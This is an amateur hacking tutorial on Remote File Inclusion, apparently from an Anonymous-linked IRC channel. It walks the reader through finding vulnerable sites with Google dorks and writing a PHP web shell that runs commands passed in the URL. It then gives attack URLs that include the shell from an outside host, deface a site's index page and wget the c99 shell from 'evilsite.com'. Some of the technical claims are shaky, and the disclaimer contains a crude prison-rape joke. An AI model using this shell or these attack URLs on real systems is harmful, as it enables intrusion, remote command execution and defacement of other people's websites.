Remote File Inclusion by Nexus

1. Remote File Inclusion - Created by Nexus - For more tutorials visit the #tutorials channel.
2. Section 1 - What is RFI?
3. RFI stands for Remote File Inclusion, it is found where a site is told to look to a directory on the server.
4. Properly coded sites will not allow other sites to act as directories, if you don't understand, you'll see an example later on.
5. Section 2 - Locating the target
6. So you can pretty much find an RFI Vuln site by just using some Google dorks or testing a site you already have.
7. Im just going to use the domain name 'Example.com'.
8. So I have my target, to see if its vulnerable, we can test with our friend Google.com :). So you type http://example.com/index.php?page=google.com/
9. and if you get a redirect to google.com, then you have a vulnerable site :).
10. Section 3 - Exploiting the target
11. So now we know that example.com is vulnerable, we can do some Remote Exploiting:).
12. Your gonna need somewhere to host in order to do this, seeing as its REMOTE File Inclusion ;) your also gonna need a shell. You could use the infamous c99.php shell, but that makes a mess of system logs, and is easy to find. So im gonna give you a basic one to make with instructions.
13. 1) Open your favourite file editor.
14. 2) Copy and paste this:
15. <?php
16. echo "<script>alert(1337);</script>";
17. echo "Executing command: ".htmlspecialchars($_GET['cmd']);
18. system($_GET['cmd']);
19. ?>
20. 3) Save the file as shell.php and make sure its All Files and not a .txt file.
21. Now we can send a few commands to this server :)
22. To send commands we can do 'ls' without the quotes for example, prosuming this is a linux server, if its windows based, use dir, etc etc.
23. So im just going to take a peak inside by using http://example.com/index.php?cmd=ls&page=http://hackersite.com/shell.php
24. That will send our command to the server, and it will start to list the documents, with this we can do much more than ls and do for example:
25. http://example.com/index.php?cmd=echo You just got OWNED! > index.php&page=http://hackersite.com/shell.php
26. http://example.com/index.php?cmd=wget http://evilsite.com/c99.txt
27. etc etc
28. Section 4 - Signing off
29. And thats my basic tutorial for RFI, i hoped you liked it, and if you dont, please tweet to @OpticalForce why you don't :)
30. ***These acts of hacking are classed as illegal under many countries, doing so could get you Arrested, raided or even buttraped during your prison sentence, we do not cover anal rape on our Insurance policy and you may or may not be fined a large amount o
31. This concludes the intro tutorial.
32. Support the Free Anons Foundation
33. http://freeanons.org or #freeanons